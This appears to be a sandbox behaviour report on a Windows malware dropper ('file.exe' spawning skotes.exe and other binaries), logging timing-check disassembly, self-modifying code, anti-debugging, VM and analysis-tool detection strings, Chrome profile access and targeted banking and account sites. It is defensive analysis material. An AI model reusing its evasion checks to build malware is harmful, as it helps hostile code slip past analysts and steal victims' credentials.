Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2084C second address: 4A2085C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A2085C second address: 4A208B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F568CBD42C9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F568CBD42BEh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F568CBD42C7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C001B second address: 49C0060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F568CECBB35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F568CECBB2Ch 0x00000015 jmp 00007F568CECBB35h 0x0000001a popfd 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0060 second address: 49C0093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F568CBD42C2h 0x00000012 sbb ax, 5E18h 0x00000017 jmp 00007F568CBD42BBh 0x0000001c popfd 0x0000001d push eax 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C0093 second address: 49C00D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F568CECBB2Eh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F568CECBB37h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49C00D6 second address: 49C0117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F568CBD42BCh 0x00000011 or esi, 4352D468h 0x00000017 jmp 00007F568CBD42BBh 0x0000001c popfd 0x0000001d push esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20BE1 second address: 4A20C21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CECBB30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F568CECBB2Dh 0x00000013 sbb esi, 5E585B96h 0x00000019 jmp 00007F568CECBB31h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20C21 second address: 4A20C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20C26 second address: 4A20C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F568CECBB2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20C34 second address: 4A20C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F568CBD42BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f call 00007F568CBD42BBh 0x00000014 movzx ecx, dx 0x00000017 pop ebx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov di, ax 0x0000001e mov ebx, eax 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F568CBD42C4h 0x00000028 push dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx edi, ax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A20C82 second address: 4A20C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3ECB2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BDA1FE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BD8D3D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A3ECFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BE181A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BD89E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 96ECB2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B0A1FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B08D3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 96ECFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B1181A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B089E3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Special instruction interceptor: First address: 512868 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Special instruction interceptor: First address: 510004 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Special instruction interceptor: First address: 6DB8E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Special instruction interceptor: First address: 6B749A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Special instruction interceptor: First address: 7CDCB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Special instruction interceptor: First address: 7CDBE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Special instruction interceptor: First address: 99CBDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Special instruction interceptor: First address: 7CDBB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Special instruction interceptor: First address: A05B47 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A20C54 rdtsc

0_2_04A20C54

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1190	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1492	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1131	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1180	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window / User API: threadDelayed 1348
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window / User API: threadDelayed 1409
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3933
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1360

Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5928	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4508	Thread sleep count: 1190 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4508	Thread sleep time: -2381190s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4352	Thread sleep count: 1492 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4352	Thread sleep time: -2985492s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3848	Thread sleep count: 1131 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3848	Thread sleep time: -2263131s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5836	Thread sleep count: 290 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5836	Thread sleep time: -8700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3160	Thread sleep count: 1180 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3160	Thread sleep time: -2361180s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6108	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe TID: 6988	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe TID: 6364	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe TID: 5396	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4932	Thread sleep time: -380190s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4936	Thread sleep time: -280140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 6876	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4268	Thread sleep time: -2697348s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4536	Thread sleep time: -2819409s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4920	Thread sleep time: -312156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe TID: 4676	Thread sleep time: -296148s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4496	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5932	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5540	Thread sleep count: 62 > 30

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_003136A9 FindFirstFileExW,	12_2_003136A9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_0031375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_0031375A
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_003136A9 FindFirstFileExW,	14_2_003136A9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0031375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_0031375A

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\.ms-ad\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\

Source: skotes.exe, skotes.exe, 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000000.1478295621.0000000000AE8000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000004.00000000.1563806196.0000000000AE8000.00000080.00000001.01000000.00000008.sdmp, 4ec75545d6.exe, 4ec75545d6.exe, 00000007.00000002.1746328880.0000000000692000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 3a1a782de7.exe, 0000000E.00000003.1981185885.0000000003643000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 3a1a782de7.exe, 0000000E.00000002.2166151595.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1935865202.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2163431504.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2118654013.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.1867873598.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2098065874.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000003.2064564073.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946353858.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 00000011.00000003.1946748605.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 3a1a782de7.exe, 0000000E.00000003.2162346361.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, 3a1a782de7.exe, 0000000E.00000002.2165685231.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW N
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: bc8eaffed4.exe, 00000014.00000003.2001150144.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000002B.00000002.2229911189.000002311F99B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: 4ec75545d6.exe, 00000007.00000002.1748637824.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__4*
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: explorer.exe, 00000031.00000002.2999450325.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'C=
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000002.1500943258.0000000000BB8000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1447653562.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1524416381.0000000000AE8000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000000.1475811559.0000000000AE8000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.1531878501.0000000000AE8000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000000.1478295621.0000000000AE8000.00000080.00000001.01000000.00000008.sdmp, skotes.exe, 00000004.00000000.1563806196.0000000000AE8000.00000080.00000001.01000000.00000008.sdmp, 4ec75545d6.exe, 00000007.00000002.1746328880.0000000000692000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 3a1a782de7.exe, 0000000E.00000003.1982974328.00000000035DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10887
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10926
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10890
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10929
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	API call chain: ExitProcess graph end node	graph_12-14467

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Open window title or class name: filemonclass
